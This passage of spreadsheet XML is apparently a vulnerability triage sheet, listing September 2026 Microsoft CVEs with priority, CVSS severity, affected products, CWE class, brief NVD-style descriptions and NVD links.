      <c r="F304" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G304" s="5" t="inlineStr"/>
      <c r="H304" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I304" s="5" t="inlineStr"/>
      <c r="J304" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K304" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L304" s="5" t="inlineStr"/>
      <c r="M304" s="5" t="inlineStr"/>
      <c r="N304" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O304" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P304" s="5" t="inlineStr"/>
      <c r="Q304" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R304" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S304" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69724</t>
        </is>
      </c>
    </row>
    <row r="305">
      <c r="A305" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B305" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C305" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69729</t>
        </is>
      </c>
      <c r="D305" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E305" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F305" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G305" s="5" t="inlineStr"/>
      <c r="H305" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I305" s="5" t="inlineStr"/>
      <c r="J305" s="5" t="inlineStr"/>
      <c r="K305" s="5" t="inlineStr"/>
      <c r="L305" s="5" t="inlineStr"/>
      <c r="M305" s="5" t="inlineStr"/>
      <c r="N305" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O305" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P305" s="5" t="inlineStr"/>
      <c r="Q305" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R305" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Credential Providers allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S305" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69729</t>
        </is>
      </c>
    </row>
    <row r="306">
      <c r="A306" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B306" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C306" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69740</t>
        </is>
      </c>
      <c r="D306" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E306" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F306" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G306" s="5" t="inlineStr"/>
      <c r="H306" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I306" s="5" t="inlineStr"/>
      <c r="J306" s="5" t="inlineStr"/>
      <c r="K306" s="5" t="inlineStr"/>
      <c r="L306" s="5" t="inlineStr"/>
      <c r="M306" s="5" t="inlineStr"/>
      <c r="N306" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O306" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P306" s="5" t="inlineStr"/>
      <c r="Q306" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R306" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S306" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69740</t>
        </is>
      </c>
    </row>
    <row r="307">
      <c r="A307" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B307" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C307" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69742</t>
        </is>
      </c>
      <c r="D307" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E307" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F307" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G307" s="5" t="inlineStr"/>
      <c r="H307" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I307" s="5" t="inlineStr"/>
      <c r="J307" s="5" t="inlineStr"/>
      <c r="K307" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:publisher</t>
        </is>
      </c>
      <c r="L307" s="5" t="inlineStr"/>
      <c r="M307" s="5" t="inlineStr"/>
      <c r="N307" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O307" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P307" s="5" t="inlineStr"/>
      <c r="Q307" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R307" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Microsoft Office Publisher allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S307" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69742</t>
        </is>
      </c>
    </row>
    <row r="308">
      <c r="A308" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B308" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C308" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69759</t>
        </is>
      </c>
      <c r="D308" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E308" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F308" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G308" s="5" t="inlineStr"/>
      <c r="H308" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I308" s="5" t="inlineStr"/>
      <c r="J308" s="5" t="inlineStr"/>
      <c r="K308" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L308" s="5" t="inlineStr"/>
      <c r="M308" s="5" t="inlineStr"/>
      <c r="N308" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O308" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P308" s="5" t="inlineStr"/>
      <c r="Q308" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R308" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S308" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69759</t>
        </is>
      </c>
    </row>
    <row r="309">
      <c r="A309" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B309" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C309" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69764</t>
        </is>
      </c>
      <c r="D309" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E309" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F309" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G309" s="5" t="inlineStr"/>
      <c r="H309" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I309" s="5" t="inlineStr"/>
      <c r="J309" s="5" t="inlineStr"/>
      <c r="K309" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L309" s="5" t="inlineStr"/>
      <c r="M309" s="5" t="inlineStr"/>
      <c r="N309" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O309" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P309" s="5" t="inlineStr"/>
      <c r="Q309" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R309" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S309" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69764</t>
        </is>
      </c>
    </row>
    <row r="310">
      <c r="A310" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B310" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C310" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69767</t>
        </is>
      </c>
      <c r="D310" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E310" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F310" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G310" s="5" t="inlineStr"/>
      <c r="H310" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I310" s="5" t="inlineStr"/>
      <c r="J310" s="5" t="inlineStr"/>
      <c r="K310" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t>
        </is>
      </c>
      <c r="L310" s="5" t="inlineStr"/>
      <c r="M310" s="5" t="inlineStr"/>
      <c r="N310" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O310" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P310" s="5" t="inlineStr"/>
      <c r="Q310" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R310" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S310" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69767</t>
        </is>
      </c>
    </row>
    <row r="311">
      <c r="A311" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B311" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C311" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69772</t>
        </is>
      </c>
      <c r="D311" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E311" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F311" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G311" s="5" t="inlineStr"/>
      <c r="H311" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I311" s="5" t="inlineStr"/>
      <c r="J311" s="5" t="inlineStr"/>
      <c r="K311" s="5" t="inlineStr"/>
      <c r="L311" s="5" t="inlineStr"/>
      <c r="M311" s="5" t="inlineStr"/>
      <c r="N311" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O311" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P311" s="5" t="inlineStr"/>
      <c r="Q311" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R311" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Network File System allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S311" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69772</t>
        </is>
      </c>
    </row>
    <row r="312">
      <c r="A312" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B312" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C312" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69778</t>
        </is>
      </c>
      <c r="D312" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E312" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F312" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G312" s="5" t="inlineStr"/>
      <c r="H312" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I312" s="5" t="inlineStr"/>
      <c r="J312" s="5" t="inlineStr"/>
      <c r="K312" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:access, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L312" s="5" t="inlineStr"/>
      <c r="M312" s="5" t="inlineStr"/>
      <c r="N312" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O312" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P312" s="5" t="inlineStr"/>
      <c r="Q312" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R312" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Access allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S312" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69778</t>
        </is>
      </c>
    </row>
    <row r="313">
      <c r="A313" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B313" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C313" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69784</t>
        </is>
      </c>
      <c r="D313" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E313" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F313" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G313" s="5" t="inlineStr"/>
      <c r="H313" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I313" s="5" t="inlineStr"/>
      <c r="J313" s="5" t="inlineStr"/>
      <c r="K313" s="5" t="inlineStr"/>
      <c r="L313" s="5" t="inlineStr"/>
      <c r="M313" s="5" t="inlineStr"/>
      <c r="N313" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O313" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P313" s="5" t="inlineStr"/>
      <c r="Q313" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R313" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S313" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69784</t>
        </is>
      </c>
    </row>
    <row r="314">
      <c r="A314" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B314" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C314" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69797</t>
        </is>
      </c>
      <c r="D314" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E314" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F314" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G314" s="5" t="inlineStr"/>
      <c r="H314" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I314" s="5" t="inlineStr"/>
      <c r="J314" s="5" t="inlineStr"/>
      <c r="K314" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t>
        </is>
      </c>
      <c r="L314" s="5" t="inlineStr"/>
      <c r="M314" s="5" t="inlineStr"/>
      <c r="N314" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O314" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P314" s="5" t="inlineStr"/>
      <c r="Q314" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R314" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S314" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69797</t>
        </is>
      </c>
    </row>
    <row r="315">
      <c r="A315" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B315" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C315" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69860</t>
        </is>
      </c>
      <c r="D315" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E315" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F315" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G315" s="5" t="inlineStr"/>
      <c r="H315" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I315" s="5" t="inlineStr"/>
      <c r="J315" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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5" s="5" t="inlineStr"/>
      <c r="M315" s="5" t="inlineStr"/>
      <c r="N315" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O315" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P315" s="5" t="inlineStr"/>
      <c r="Q315" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R315" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S315" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69860</t>
        </is>
      </c>
    </row>
    <row r="316">
      <c r="A316" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B316" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C316" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70178</t>
        </is>
      </c>
      <c r="D316" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E316" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F316" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G316" s="5" t="inlineStr"/>
      <c r="H316" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I316" s="5" t="inlineStr"/>
      <c r="J316" s="5" t="inlineStr"/>
      <c r="K316" s="5" t="inlineStr">
        <is>
          <t>microsoft:fabric</t>
        </is>
      </c>
      <c r="L316" s="5" t="inlineStr"/>
      <c r="M316" s="5" t="inlineStr"/>
      <c r="N316" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O316" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P316" s="5" t="inlineStr"/>
      <c r="Q316" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R316" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Microsoft Fabric allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S316" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70178</t>
        </is>
      </c>
    </row>
    <row r="317">
      <c r="A317" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B317" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C317" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70203</t>
        </is>
      </c>
      <c r="D317" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E317" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F317" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G317" s="5" t="inlineStr"/>
      <c r="H317" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I317" s="5" t="inlineStr"/>
      <c r="J317" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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7" s="5" t="inlineStr"/>
      <c r="M317" s="5" t="inlineStr"/>
      <c r="N317" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O317" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P317" s="5" t="inlineStr"/>
      <c r="Q317" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R317" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Media Player allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S317" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70203</t>
        </is>
      </c>
    </row>
    <row r="318">
      <c r="A318" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B318" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C318" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70351</t>
        </is>
      </c>
      <c r="D318" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E318" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F318" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G318" s="5" t="inlineStr"/>
      <c r="H318" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I318" s="5" t="inlineStr"/>
      <c r="J318" s="5" t="inlineStr"/>
      <c r="K318" s="5" t="inlineStr"/>
      <c r="L318" s="5" t="inlineStr"/>
      <c r="M318" s="5" t="inlineStr"/>
      <c r="N318" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O318" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P318" s="5" t="inlineStr"/>
      <c r="Q318" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="R318" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Microsoft WebP Image Extension allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S318" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70351</t>
        </is>
      </c>
    </row>
    <row r="319">
      <c r="A319" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B319" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C319" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70586</t>
        </is>
      </c>
      <c r="D319" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E319" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F319" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G319" s="5" t="inlineStr"/>
      <c r="H319" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I319" s="5" t="inlineStr"/>
      <c r="J319" s="5" t="inlineStr"/>
      <c r="K319" s="5" t="inlineStr"/>
      <c r="L319" s="5" t="inlineStr"/>
      <c r="M319" s="5" t="inlineStr"/>
      <c r="N319" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O319" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P319" s="5" t="inlineStr"/>
      <c r="Q319" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R319" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Paint allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S319" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70586</t>
        </is>
      </c>
    </row>
    <row r="320">
      <c r="A320" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B320" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C320" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71328</t>
        </is>
      </c>
      <c r="D320" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E320" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F320" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G320" s="5" t="inlineStr"/>
      <c r="H320" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I320" s="5" t="inlineStr"/>
      <c r="J320" s="5" t="inlineStr"/>
      <c r="K320" s="5" t="inlineStr">
        <is>
          <t>microsoft:.net, microsoft:visual_studio_2022, microsoft:visual_studio_2026, microsoft:windows</t>
        </is>
      </c>
      <c r="L320" s="5" t="inlineStr"/>
      <c r="M320" s="5" t="inlineStr"/>
      <c r="N320" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O320" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P320" s="5" t="inlineStr"/>
      <c r="Q320" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R320" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S320" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71328</t>
        </is>
      </c>
    </row>
    <row r="321">
      <c r="A321" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B321" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C321" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71336</t>
        </is>
      </c>
      <c r="D321" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E321" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F321" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G321" s="5" t="inlineStr"/>
      <c r="H321" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I321" s="5" t="inlineStr"/>
      <c r="J321" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K321" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L321" s="5" t="inlineStr"/>
      <c r="M321" s="5" t="inlineStr"/>
      <c r="N321" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O321" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P321" s="5" t="inlineStr"/>
      <c r="Q321" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R321" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Work Folder Service allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S321" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71336</t>
        </is>
      </c>
    </row>
    <row r="322">
      <c r="A322" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B322" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C322" s="5" t="inlineStr">
        <is>
